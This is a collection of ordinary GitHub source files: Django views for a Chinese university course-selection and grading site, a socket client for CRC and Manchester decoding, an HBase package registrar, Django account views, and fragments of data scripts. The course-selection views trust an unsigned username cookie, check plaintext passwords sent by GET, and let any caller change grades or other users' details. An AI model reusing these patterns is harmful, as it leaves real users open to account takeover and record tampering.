'teacherinfo.html', {'userinfo':userinfo})\n\ndef studentinfo_update(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n user = Users.objects.get(username = cook)\n if user.customertype == 0:\n userinfo = Userinfo.objects.get(user_username=cook) # update可多条\n dep = Department_College.objects.get(departmentnumber=userinfo.user_department)\n userinfo.user_department = dep.departmentname\n userinfo.user_college = dep.collegename\n return render(request, 'studentinfo_update.html', {'userinfo':userinfo})\n elif user.customertype == 1:\n userinfo = Teacherinfo.objects.get(teacher_username=cook)\n dep = Department_College.objects.get(departmentnumber=userinfo.teacher_faculty)\n userinfo.teacher_faculty = dep.departmentname + dep.collegename\n return render(request, 'teacherinfo_update.html', {'userinfo':userinfo})\n\ndef studentinfo_update_save(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n try:\n username = request.GET.get('username')\n phone = request.GET.get('phone')\n adress = request.GET.get('adress')\n print(username, phone, adress)\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n Userinfo.objects.filter(user_username=username).update(user_phone=phone, user_adress=adress) # update可多条\n elif user.customertype == 1:\n Teacherinfo.objects.filter(teacher_username = username).update(teacher_phone=phone, teacher_adress=adress)\n return HttpResponse('修改成功!')\n except:\n return HttpResponse('修改数据异常!')\n\n\ndef classschedule(request):\n cook = request.COOKIES.get('username')\n if cook == None:\n return render(request, 'login.html')\n print('cook:', cook)\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n return render(request, 'classschedule.html')\n elif user.customertype == 1:\n return render(request, 'teacher_classschedule.html')\n\ndef get_classschedule(request):\n def get_time_place(data):\n time = []\n place = []\n res1 = data.split(';')\n for res2 in res1:\n res3 = res2.split('|')\n res4 = res3[0].split(',')\n tag = 0\n for t in res4:\n time.append(t)\n\n place.append(res3[1])\n return time, place\n\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n one = {}\n two = {}\n three = {}\n four = {}\n five = {}\n six = {}\n seven = {}\n eight = {}\n nine = {}\n ten = {}\n eleven = {}\n\n param = Params.objects.get(param='term')\n user = Users.objects.get(username=cook)\n if user.customertype == 0:\n studentcourses = StudentCourse.objects.filter(student_username = cook,term_now=param.term_now, tag=param.tag)\n elif user.customertype == 1:\n studentcourses = TeacherCourse.objects.filter(course_teacher_username = cook,\n term=param.term_now, tag=param.tag)\n for studentcourse in studentcourses:\n if user.customertype == 0:\n course = TeacherCourse.objects.get(course_teacher_username = studentcourse.teacher_username,\n course_code = studentcourse.course_code, term=param.term_now, tag=param.tag)\n elif user.customertype == 1:\n course = studentcourse\n times, places= get_time_place(course.course_classtime)\n courseinfo = Courseinfo.objects.get(course_code = course.course_code)\n for time in times:\n classtime = Classtime.objects.get(num=time)\n place = Classroom.objects.get(classroomnum = places[0])\n am = {}\n\n if classtime.weekday == '周一':\n am['Mon'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周二':\n am['Tues'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周三':\n am['Wed'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周四':\n am['Thur'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周五':\n am['Fri'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周六':\n am['Satu'] = courseinfo.course_name+'('+ place.classroomname +')'\n elif classtime.weekday == '周日':\n am['Sun'] = courseinfo.course_name+'('+ place.classroomname +')'\n\n if classtime.classnum == '第一节课':\n one.update(am)\n elif classtime.classnum == '第二节课':\n two.update(am)\n elif classtime.classnum == '第三节课':\n three.update(am)\n elif classtime.classnum == '第四节课':\n four.update(am)\n elif classtime.classnum == '第五节课':\n five.update(am)\n elif classtime.classnum == '第六节课':\n six.update(am)\n elif classtime.classnum == '第七节课':\n seven.update(am)\n elif classtime.classnum == '第八节课':\n eight.update(am)\n elif classtime.classnum == '第九节课':\n nine.update(am)\n elif classtime.classnum == '第十节课':\n ten.update(am)\n elif classtime.classnum == '第十一节课':\n eleven.update(am)\n\n schedule1 = []\n schedule1.append(one)\n schedule1.append(two)\n schedule1.append(three)\n schedule1.append(four)\n schedule1.append(five)\n schedule1.append(six)\n schedule1.append(seven)\n schedule1.append(eight)\n schedule1.append(nine)\n schedule1.append(ten)\n schedule1.append(eleven)\n schedule = {}\n schedule['rows'] = schedule1\n schedule = json.dumps(schedule)\n return HttpResponse(schedule, content_type='application/json')\n\n\ndef selsubnotice(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n return render(request, 'selsubnotice.html')\n\ndef selsubhelp(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'selsubhelp.html')\n\ndef gradecheck(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n param = Params.objects.get(param = 'term')\n userinfo = Userinfo.objects.get(user_username = cook)\n yearnum = int(param.term_now) - int(userinfo.user_grade)\n term = []\n for i in range(yearnum+1):\n if i == 0:\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n else:\n if i == yearnum:\n if param.tag == 0:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n else:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n else:\n term.append(str(int(userinfo.user_grade) + i - 1) + '年~'+ str(int(userinfo.user_grade)+i) + '第二学期')\n term.append(str(int(userinfo.user_grade) + i) + '年~'+ str(int(userinfo.user_grade) + i + 1) +'第一学期')\n num = len(term)\n return render(request, 'gradecheck.html', {'term': json.dumps(term)})\n\n\ndef login(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n return render(request, 'login.html')\n\ndef login_check(request):\n try:\n regResponse = {\"errorCode\": 0, \"errorsList\": ''}\n username = request.GET.get('username')\n password = request.GET.get('password')\n if (username == '') or (password == ''):\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名或密码不能为空。'\n return HttpResponse(json.dumps(regResponse))\n try:\n account = Users.objects.get(username=username)\n # account = ue.objects.all()\n except:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名密码不存在。'\n return HttpResponse(json.dumps(regResponse))\n if account == None:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '用户名不存在。'\n return HttpResponse(json.dumps(regResponse))\n elif password != account.password:\n regResponse['errorCode'] = 1\n regResponse['errorsList'] = '密码错误。'\n return HttpResponse(json.dumps(regResponse))\n elif (account.customertype ==0) or (account.customertype ==1):\n response = HttpResponse(json.dumps(regResponse))\n response.set_cookie(\"username\", username)\n request.session['is_login'] = 'true'\n request.session['username'] = username\n return response\n\n except:\n return HttpResponse('登录异常。')\n\n\ndef getcourse(request):\n def get_time_place(data):\n res = ''\n res1 = data.split(';')\n for res2 in res1:\n res3 = res2.split('|')\n res4 = res3[0].split(',')\n tag = 0\n for t in res4:\n cla = Classtime.objects.get(num=str(t))\n if tag == 0:\n res = res + cla.weekday + cla.classnum\n tag+=1\n else:\n res = res + cla.classnum\n\n classroom = Classroom.objects.get(classroomnum=res3[1])\n res = res + '(' + classroom.classroomname + ');'\n\n return res\n\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n\n cou = []\n account = Userinfo.objects.get(user_username=cook)\n department = account.user_department\n college = account.user_college\n print(department, ' ', college)\n\n teachercourses = TeacherCourse.objects.filter(course_to_department=department, course_to_college=college)\n for teachercourse in teachercourses:\n course = Courseinfo.objects.get(course_code=teachercourse.course_code)\n teacher = Teacherinfo.objects.get(teacher_username=teachercourse.course_teacher_username)\n isCheck = StudentCourse.objects.filter(course_code = course.course_code, student_username=cook,\n teacher_username = teacher.teacher_username)\n\n\n if isCheck:\n check = '删除'\n else:\n check = '选择'\n cou.append({\n 'name': course.course_name,\n 'nameid': course.course_code,\n 'namexh': course.course_number,\n 'teacher': teacher.teacher_name,\n 'teacher_username': teacher.teacher_username,\n 'namelex': course.course_attribute,\n 'gradelex': teachercourse.course_examtype,\n 'place': get_time_place(teachercourse.course_classtime),\n 'week': teachercourse.course_classweek,\n 'select': check,\n })\n return HttpResponse(json.dumps(cou), content_type=\"application/json\")\n\ndef selectsubject_action(request):\n try:\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n data = request.POST.get('data')\n action = request.POST.get('action')\n data = unquote(data)\n data = json.loads(data)\n teacher_username = data['teacher_username']\n course_code = data['nameid']\n student_username = cook\n param = Params.objects.get(param = 'term')\n if action == 'select':\n isCheck = StudentCourse.objects.filter(course_code=course_code, exam_num = 1, term_now = param.term_now, tag = param.tag)\n if isCheck:\n return HttpResponse(json.dumps({'rescode': '0', 'res': '已选择该门课程,请选择其他课程。'}))\n StudentCourse.objects.create(course_code=course_code, student_username=student_username,\n teacher_username=teacher_username, term_now = param.term_now, tag = param.tag)\n return HttpResponse(json.dumps({'rescode': '1', 'res': '选课成功。'}))\n else:\n StudentCourse.objects.filter(course_code=course_code, student_username=student_username,\n teacher_username=teacher_username, exam_num = 1, term_now = param.term_now, tag = param.tag).delete()\n return HttpResponse(json.dumps({'rescode': '1', 'res': '删除成功。'}))\n except:\n return HttpResponse(json.dumps({'rescode': '1', 'res': '操作异常,请重新选择。'}))\n\n\n\ndef gradecheck_get(request):\n text = request.GET.get('text')\n year = text[:4]\n if '一' in text:\n tag = 1\n else:\n year = str(int(year) + 1)\n tag = 0\n studentcourse = StudentCourse.objects.filter(term_now = year, tag = tag)\n if studentcourse == None:\n return HttpResponse('未查询到数据。')\n else:\n cou = []\n for i in studentcourse:\n course = Courseinfo.objects.get(course_code = i.course_code)\n if i.ispass == 0:\n res = '尚未评定'\n elif i.ispass == 1:\n res = '通过'\n else:\n res = '未通过'\n cou.append({\n 'name': course.course_name,\n 'grade': i.course_grade,\n 'pass': res,\n })\n return HttpResponse(json.dumps(cou), content_type=\"application/json\")\n\n\ndef studyagain(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n return render(request, 'studyagain.html')\n\n\n\ndef teacher_courseinfo(request):\n cook = request.COOKIES.get('username')\n print('cook:', cook)\n if cook == None:\n return render(request, 'login.html')\n param = Params.objects.get(param = 'term')\n teachercourses = TeacherCourse.objects.filter(course_teacher_username = cook,term = param.term_now, tag=param.tag)\n course = []\n stu = []\n for teachercourse in teachercourses:\n cou = Courseinfo.objects.get(course_code=teachercourse.course_code)\n course.append({\n 'code': cou.course_code,\n 'name': cou.course_name,\n })\n\n return render(request, 'teacher_courseinfo.html', {'course': json.dumps(course)})\n\ndef getteacher_course(request):\n code = request.GET.get('code')\n text = request.GET.get('text')\n param = Params.objects.get(param='term')\n stus = StudentCourse.objects.filter(course_code=code,term_now = param.term_now, tag=param.tag)\n student = []\n for stu in stus:\n stuinfo = Userinfo.objects.get(user_username = stu.student_username)\n if stu.course_grade == 0:\n grade = ''\n else:\n grade = stu.course_grade\n if stu.ispass == 0:\n ispass = ''\n elif stu.ispass == 1:\n ispass = '通过'\n else:\n ispass = '未通过'\n student.append({\n 'id': stuinfo.user_username,\n 'name': stuinfo.user_name,\n 'coursename': text,\n 'grade': grade,\n 'pass':ispass,\n 'edit': '编辑',\n })\n return HttpResponse(json.dumps(student), content_type='application/json')\n\n\ndef save_studentgrade(request):\n xh = request.GET.get('xh')\n courseid = request.GET.get('courseid')\n grade = request.GET.get('grade')\n if grade == '':\n grade = 0\n else:\n grade = float(grade)\n ispass = int(request.GET.get('ispass', 0))\n try:\n param = Params.objects.get(param = 'term')\n StudentCourse.objects.filter(student_username=xh, course_code=courseid,\n term_now = param.term_now, tag=param.tag).update(course_grade=grade, ispass=ispass)\n return HttpResponse('保存成功。')\n except:\n return HttpResponse('保存失败,请重新录入。')\n\n\n\n\n\n\n","repo_name":"SmallRedHXB/django-python-","sub_path":"Mypage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37583699009","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 2 01:46:07 2019\r\n\r\n@author: Shashwat Kathuria\r\n\"\"\"\r\n\r\n# Client Side Program\r\n# Physical Layer and Data Link Layer Implementation\r\n\r\n# Importing socket library for socket programming\r\nimport socket, random\r\nimport pylab as plt\r\n\r\ndef main():\r\n\r\n # Getting required input\r\n generator = raw_input(\"Enter the generator function in 0s and 1s : \")\r\n finalDecodedMessage = \"\"\r\n while True:\r\n\r\n # Configuration for socket\r\n s = socket.socket()\r\n port = 9999\r\n try:\r\n # Connecting\r\n s.connect((\"127.0.0.1\", port))\r\n except:\r\n break\r\n # Getting received message from server\r\n receivedMessage = s.recv(1024).decode()\r\n\r\n # Decoding message from Physical Layer which itself takes help from\r\n # Data Link Layer for error detection\r\n physicalLayer = PhysicalLayer(receivedMessage)\r\n decodedMessage = physicalLayer.decode(generator)\r\n\r\n # Printing Answer\r\n if decodedMessage != None:\r\n print(\"\\nDecoded Frame Message : \" + str(decodedMessage))\r\n finalDecodedMessage += str(decodedMessage)\r\n else:\r\n print(\"\\nError detected in data by CRC (Cyclic Redundancy Check).\")\r\n\r\n # Plotting and showing encodings through graphs\r\n physicalLayer.plotManchesterEncoding()\r\n physicalLayer.plotOriginalEncoding()\r\n # Closing connection\r\n s.close()\r\n print(\"--------------------------------------\")\r\n # Printing final answer\r\n print(\"\\nFinal Decoded Message : \" + str(finalDecodedMessage))\r\n print(\"--------------------------------------\")\r\n\r\n\r\nclass PhysicalLayer():\r\n\r\n def __init__(self, bits):\r\n \"\"\"Function to initialize Physical Layer Object.\"\"\"\r\n\r\n self.message = \"\"\r\n self.bits = bits\r\n self.decodedMessage = \"\"\r\n self.time = list(range(len(self.bits)))\r\n self.manchesterEncoding = bits\r\n self.manchesterYVal = []\r\n self.originalYVal = []\r\n\r\n def decode(self, generator):\r\n \"\"\"Function to decode data using Manchester Encoding.\r\n Generator variable used to pass onto Data Link Layer Object.\"\"\"\r\n\r\n # Variable to keep track of decoded part of Manchester Encoding\r\n temp = \"\"\r\n print(\"\\nManchester Encoding : \\n\" + str(self.bits))\r\n\r\n # Getting values for manchester encoding graph plot\r\n yVal = [int(x) for x in list(self.bits)]\r\n temp = []\r\n for val in yVal:\r\n if val == 0:\r\n temp.append(-1)\r\n else:\r\n temp.append(1)\r\n yVal = temp\r\n self.manchesterYVal = yVal\r\n\r\n temp = \"\"\r\n # Decoding Manchester encoding in pairs\r\n for i in range(0, len(self.bits), 2):\r\n # Getting bits pair\r\n s = self.bits[i: i + 2]\r\n # If Low High then 1\r\n if s == \"01\":\r\n temp += \"1\"\r\n # If High Low then 0\r\n elif s == \"10\":\r\n temp += \"0\"\r\n\r\n # Storing answer\r\n self.bits = temp\r\n\r\n # Getting values for original encoding graph plot\r\n tempOriginalYVal = [int(x) for x in self.bits]\r\n for y in tempOriginalYVal:\r\n self.originalYVal.append(y)\r\n self.originalYVal.append(y)\r\n\r\n # Decoded to original encoding with CRC Remainder\r\n print(\"\\nOriginal Encoding With CRC Remainder : \\n\" + str(self.bits))\r\n\r\n choice = raw_input(\"\\nDo you deliberately want to introduce errors into the frame signal to check the program?Press 1 for yes else give any other input : \")\r\n\r\n # Introducing Errors Deliberately if choice is 1\r\n if choice == \"1\":\r\n temp = list(self.bits)\r\n # For 5 iterations\r\n for i in range(5):\r\n index = random.randint(0, len(self.bits) - 1)\r\n if temp[index] == \"0\":\r\n temp[index] = \"1\"\r\n elif temp[index] == \"1\":\r\n temp[index] = \"0\"\r\n\r\n self.bits = \"\".join(temp)\r\n\r\n print(\"\\nOriginal Encoding With CRC Remainder After Introducing Deliberate Errors : \\n\" + str(self.bits))\r\n\r\n # Getting checksum\r\n CRCchecksum = DataLinkLayer(self.bits, generator).CRCdetectError()\r\n\r\n # Printing checksum\r\n print(\"\\nCRC Remainder : \\n\" + str(CRCchecksum))\r\n\r\n # Checking further cases\r\n if CRCchecksum == '0' * (len(generator) - 1):\r\n self.bits = self.bits[:-(len(generator) - 1)]\r\n # Error case\r\n if len(self.bits) % 8 != 0:\r\n print(\"\\nError detected in data. Number of bits not a multiple of 8.\\n\")\r\n return None\r\n # Correct case\r\n else:\r\n print(\"\\nNo Error.\")\r\n print(\"\\nOriginal Encoding Without CRC Remainder : \\n\" + str(self.bits))\r\n return self.bitsToString()\r\n # Error case\r\n else:\r\n print(\"\\nError detected in data. CRC Remainder is not equal to \" + str('0' * (len(generator) - 1)))\r\n return None\r\n\r\n\r\n def bitsToString(self):\r\n \"\"\"Function to convert a stream of bits into string using ascii and bit values.\"\"\"\r\n\r\n # Lists to store bits and chars\r\n chars = []\r\n bitsArray = []\r\n\r\n # Storing all bits in an array\r\n for i in self.bits:\r\n bitsArray.append(int(i))\r\n\r\n # Converting 8 bits (each byte) into a char\r\n for b in range(len(bitsArray) // 8):\r\n\r\n # Getting 8 bits/a byte\r\n byte = bitsArray[b*8:(b+1)*8]\r\n # Converting to a char and then appending to list of chars\r\n # Base 2 for bit\r\n chars.append(chr(int(''.join([str(bit) for bit in byte]), 2)))\r\n\r\n # Concatenating chars and storing\r\n self.decodedMessage = ''.join(chars)\r\n\r\n # Returning answer\r\n return self.decodedMessage\r\n\r\n def plotManchesterEncoding(self):\r\n \"\"\"Function to plot Manchester Encoding.\"\"\"\r\n\r\n # Plotting and configuring the graph\r\n plt.figure(\"Graph\")\r\n plt.title(\"Manchester Encoding\")\r\n plt.clf()\r\n plt.xlim(0, len(self.time))\r\n plt.xlabel(\"Time || Manchester Encoding\")\r\n plt.ylabel(\"Encoding Value\")\r\n plt.plot(self.time, self.manchesterYVal, drawstyle='steps-post')\r\n plt.show()\r\n\r\n def plotOriginalEncoding(self):\r\n \"\"\"Function to plot Original Encoding.\"\"\"\r\n\r\n # Plotting and configuring the graph\r\n plt.figure(\"Graph\")\r\n plt.title(\"Original Encoding\")\r\n plt.clf()\r\n plt.xlim(0, len(self.time))\r\n plt.xlabel(\"Time || Original Encoding\")\r\n plt.ylabel(\"Encoding Value\")\r\n plt.plot(self.time, self.originalYVal, drawstyle='steps-post')\r\n plt.show()\r\n\r\nclass DataLinkLayer():\r\n def __init__(self, bits, generator):\r\n \"\"\"Function to initialize Data Link Layer Object.\"\"\"\r\n\r\n self.bits = bits\r\n self.keyLength = len(generator)\r\n self.appendedData = self.bits + \"0\" * (self.keyLength - 1)\r\n self.generator = generator\r\n\r\n def CRCdetectError(self):\r\n \"\"\"Function to encode data using CRC(Cyclic Redundancy Checksum).\"\"\"\r\n\r\n divisor = self.generator\r\n divident = self.appendedData\r\n\r\n # Number of bits to be xored\r\n numBits = len(self.generator)\r\n\r\n # Subpart substring\r\n subpartSubstring = self.appendedData[0 : numBits]\r\n\r\n while numBits < len(self.appendedData):\r\n\r\n # If Leftmost bit is 1\r\n if subpartSubstring[0] == '1':\r\n\r\n # Using self.generator and appending a data bit at the end\r\n subpartSubstring = self.XOR(self.generator, subpartSubstring) + self.appendedData[numBits]\r\n # Else if leftmost bit is 0\r\n else:\r\n # Using all '0's generator\r\n subpartSubstring = self.XOR('0'*numBits, subpartSubstring) + divident[numBits]\r\n\r\n # increment numBits to move further\r\n numBits += 1\r\n\r\n # For the last nth bits, otherwise out of bound occurs due to numBits\r\n # If Leftmost bit is 1\r\n if subpartSubstring[0] == '1':\r\n\r\n # Using self.generator\r\n subpartSubstring = self.XOR(divisor, subpartSubstring)\r\n # Else if leftmost bit is 0\r\n else:\r\n\r\n # Using all '0's generator\r\n subpartSubstring = self.XOR('0' * numBits, subpartSubstring)\r\n\r\n # Returning checksum answer\r\n checksum = subpartSubstring\r\n return checksum\r\n\r\n def XOR(self, messagePartition, generator):\r\n \"\"\"Function to xor a messagePartition and generator.\r\n Also cutting of first bit of xor.\"\"\"\r\n\r\n # Variable required\r\n self.xor = \"\"\r\n # Iterating through bits at respective positions\r\n for bit1, bit2 in zip(messagePartition, generator):\r\n # XORing\r\n if bit1 == bit2:\r\n self.xor = self.xor + \"0\"\r\n else:\r\n self.xor = self.xor + \"1\"\r\n\r\n # Returning answer\r\n return self.xor[1 : ]\r\n\r\n\r\n\r\n\r\n\r\n# Calling main function\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shashwatkathuria/Socket-Programming","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"18085984671","text":"import logging\nimport json\n\nimport happybase\nfrom Hbase_thrift import AlreadyExists\n\nfrom package_parser import PackageParser\nfrom deployer_utils import HDFS\n\nfrom exceptiondef import FailedConnection\n\nfrom hbase_utils import encode,decode\n\nclass HbasePackageRegistrar(object):\n COLUMN_DEPLOY_STATUS = 'cf:deploy_status'\n\n def __init__(self, hbase_host, hdfs_host, hdfs_user, hdfs_port, package_local_dir_path):\n self._hbase_host = hbase_host\n self._hdfs_user = hdfs_user\n self._hdfs_host = hdfs_host\n self._hdfs_port = hdfs_port\n self._hdfs_client = HDFS(hdfs_host, hdfs_port, hdfs_user)\n self._parser = PackageParser()\n self._table_name = 'platform_packages'\n self._dm_root_dir_path = \"/pnda/system/deployment-manager\"\n self._package_hdfs_dir_path = \"%s/packages\" % self._dm_root_dir_path\n self._package_local_dir_path = package_local_dir_path\n\n try:\n if hdfs_host is not None:\n self._hdfs_client.make_dir(self._dm_root_dir_path, permission=755)\n self._hdfs_client.make_dir(self._package_hdfs_dir_path, permission=600)\n logging.debug(\"packages HDFS folder created\")\n else:\n logging.debug(\"not creating packages HDFS folder as it is not required\")\n except AlreadyExists:\n logging.debug(\"not creating packages HDFS folder as it already exists\")\n\n if self._hbase_host is not None:\n connection = happybase.Connection(self._hbase_host)\n try:\n connection.create_table(self._table_name, {'cf': dict()})\n logging.debug(\"packages table created\")\n except AlreadyExists:\n logging.debug(\"packages table exists\")\n finally:\n connection.close()\n\n def set_package(self, package_name, package_data_path, user):\n logging.debug(\"Storing %s\", package_name)\n metadata = self._parser.get_package_metadata(package_data_path)\n metadata['user'] = user\n key, data = self.generate_record(metadata)\n self._write_to_hdfs(package_data_path, data['cf:package_data'])\n self._write_to_db(key, data)\n\n def set_package_deploy_status(self, package_name, deploy_status):\n \"\"\"\n Stores information about the progress of the deploy process of the package\n :param deploy_status: the state to store\n \"\"\"\n logging.debug(\"Storing state for %s: %s\", package_name, str(deploy_status))\n state_as_string = json.dumps(deploy_status)\n self._write_to_db(package_name, {self.COLUMN_DEPLOY_STATUS: state_as_string})\n\n def delete_package(self, package_name):\n logging.debug(\"Deleting %s\", package_name)\n package_data_hdfs_path = self._read_from_db(package_name, ['cf:package_data'])['cf:package_data']\n self._hdfs_client.remove(package_data_hdfs_path)\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n table.delete(package_name)\n finally:\n connection.close()\n\n def get_package_data(self, package_name):\n logging.debug(\"Reading %s\", package_name)\n record = self._read_from_db(package_name, ['cf:package_data'])\n if not record:\n return None\n local_package_path = \"%s/%s\" % (self._package_local_dir_path, package_name)\n self._read_from_hdfs(record['cf:package_data'], local_package_path)\n return local_package_path\n\n def get_package_metadata(self, package_name):\n logging.debug(\"Reading %s\", package_name)\n package_data = self._read_from_db(\n package_name, ['cf:metadata', 'cf:name', 'cf:version'])\n if not package_data:\n return None\n return {\"metadata\": json.loads(package_data['cf:metadata']), \"name\": package_data[\n 'cf:name'], \"version\": package_data['cf:version']}\n\n def package_exists(self, package_name):\n logging.debug(\"Checking %s\", package_name)\n package_data = self._read_from_db(package_name, ['cf:name'])\n return len(package_data) > 0\n\n def get_package_deploy_status(self, package_name):\n \"\"\"\n :param package_name: the package name to check status for\n :return: The last reported progress of the deploy process for the current package\n \"\"\"\n logging.debug(\"Checking %s\", package_name)\n package_data = self._read_from_db(package_name, columns=[self.COLUMN_DEPLOY_STATUS])\n if not package_data:\n return None\n # all status is stored as json, so parse it and return it\n deploy_status_as_string = package_data[self.COLUMN_DEPLOY_STATUS]\n return json.loads(deploy_status_as_string)\n\n def list_packages(self):\n logging.debug(\"List all packages\")\n\n connection = None\n try:\n connection = happybase.Connection(self._hbase_host)\n table = connection.table(self._table_name)\n result = [key.decode() for key, _ in table.scan(columns=['cf:name'])]\n except Exception as exc:\n logging.debug(str(exc))\n raise FailedConnection('Unable to connect to the HBase master')\n finally:\n if connection:\n connection.close()\n return result\n\n def generate_record(self, metadata):\n return metadata[\"package_name\"], {\n 'cf:name': '-'.join(metadata[\"package_name\"].split(\"-\")[:-1]),\n 'cf:version': metadata[\"package_name\"].split(\"-\")[-1],\n 'cf:metadata': json.dumps(metadata),\n 'cf:package_data': \"%s/%s\" % (self._package_hdfs_dir_path, metadata[\"package_name\"])\n }\n\n def _read_from_db(self, key, columns):\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n data = table.row(encode(key), columns=encode(columns))\n finally:\n connection.close()\n \n return decode(data)\n\n def _read_from_hdfs(self, source_hdfs_path, dest_local_path):\n self._hdfs_client.stream_file_to_disk(source_hdfs_path, dest_local_path)\n\n def _write_to_db(self, key, data):\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n table.put(encode(key), encode(data))\n finally:\n connection.close()\n\n def _write_to_hdfs(self, source_local_path, dest_hdfs_path):\n with open(source_local_path, 'rb') as source_file:\n first = True\n chunk_size = 10*1024*1024\n data_chunk = source_file.read(chunk_size)\n while data_chunk:\n if first:\n self._hdfs_client.create_file(data_chunk, dest_hdfs_path, permission=600)\n first = False\n else:\n self._hdfs_client.append_file(data_chunk, dest_hdfs_path)\n data_chunk = source_file.read(chunk_size)\n","repo_name":"pndaproject/platform-deployment-manager","sub_path":"api/src/main/resources/package_registrar.py","file_name":"package_registrar.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5648979492","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login\nfrom ayomi_website.authentication.forms import SignUpForm, ChangeEmailForm\n\n\ndef signup(request):\n \"\"\"A view that displays the new account registration form.\n And save the new account to the database.\"\"\"\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('account')\n else:\n form = SignUpForm()\n return render(request, 'authentication/signup.html',\n {'form': form})\n else:\n form = SignUpForm()\n return render(request, 'authentication/signup.html', {'form': form})\n\n\ndef account_view(request):\n \"\"\"A view that displays the details of a user account.\"\"\"\n if request.user.is_authenticated:\n user = request.user\n form = ChangeEmailForm()\n return render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n return redirect('login')\n\n\ndef change_email(request):\n \"\"\"A view that changes the user's password\"\"\"\n form = ChangeEmailForm(request.POST)\n if request.user.is_authenticated:\n user = request.user\n if request.method == 'POST':\n if form.is_valid():\n user.email = form.cleaned_data['email']\n user.save()\n return render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n return redirect('login')\n","repo_name":"micktymoon/ayomi_website_test","sub_path":"ayomi_website/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29187862150","text":"import os\nimport pandas as pd\n\nwriter = pd.ExcelWriter('out.xlsx', engine='xlsxwriter')\nall_files = os.listdir('Results/compiled/')\nfor f in all_files:\n df = pd.read_csv('Results/compiled/'+f)\n df.to_excel(writer, sheet_name=os.path.basename(f))\n\nwriter.save()","repo_name":"sehejjain/Nature-Inspired-Algorithms","sub_path":"combine_sheets.py","file_name":"combine_sheets.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"38421346243","text":"# -*- coding: utf-8 -*-\nimport lea.data.Data as data\nimport lea.mesure.Piv3D as piv\nimport lea.mesure.Mesure as m\nimport lea.hdf5.h5py_convert as h5py\nimport lea.hdf5.routine as routine\n\nimport os\nimport glob\nimport time\n\n#basefolder = '/media/stephane/DATA/Experimental_data/Turbulence3d'\n#adresse_s = basefolder\n#routine.convert_arbo(basefolder, adresse_s)\n\n\n###Création de la Data :###\n##Depuis un fichier cine, jpg, dossier...\ndate = \"20181126\"\nheure = \"1000\"\n\n#base = \"/media/stephane/\"\n#folder = 'DATA/Experimental_data/Turbulence3d/'+date+'/'\n\nbase = \"\"\nfolder = '/Volumes/Diderot/DATA_Princeton_November2018/20181126/'\nadresse_s= '/Users/stephane/Documents/Postdoc_Princeton/Piv3d/20181106/'\n\n\nl =glob.glob(base+folder+'*.cine')\nprint(\"number of cinefiles : \"+str(len(l)))\n\ncinefile = l[0].rsplit(\".\",1)[0]\n\nfichier = cinefile+'.cine'#\"/media/stephane/OS/Documents and Settings/Stephane/Documents/Data_buffer/20181010/PIV3dscan_nikon50mm_f1kHz_A800mV_offsetm2800mV_4pumpsOn.cine\"\n#cherche le fichier param associé\nparam =glob.glob(base+folder+'*.txt')[0] #si un seul fichier param présent\nspec=fichier\n\nd = data.Data(fichier, param, spec, date=date, 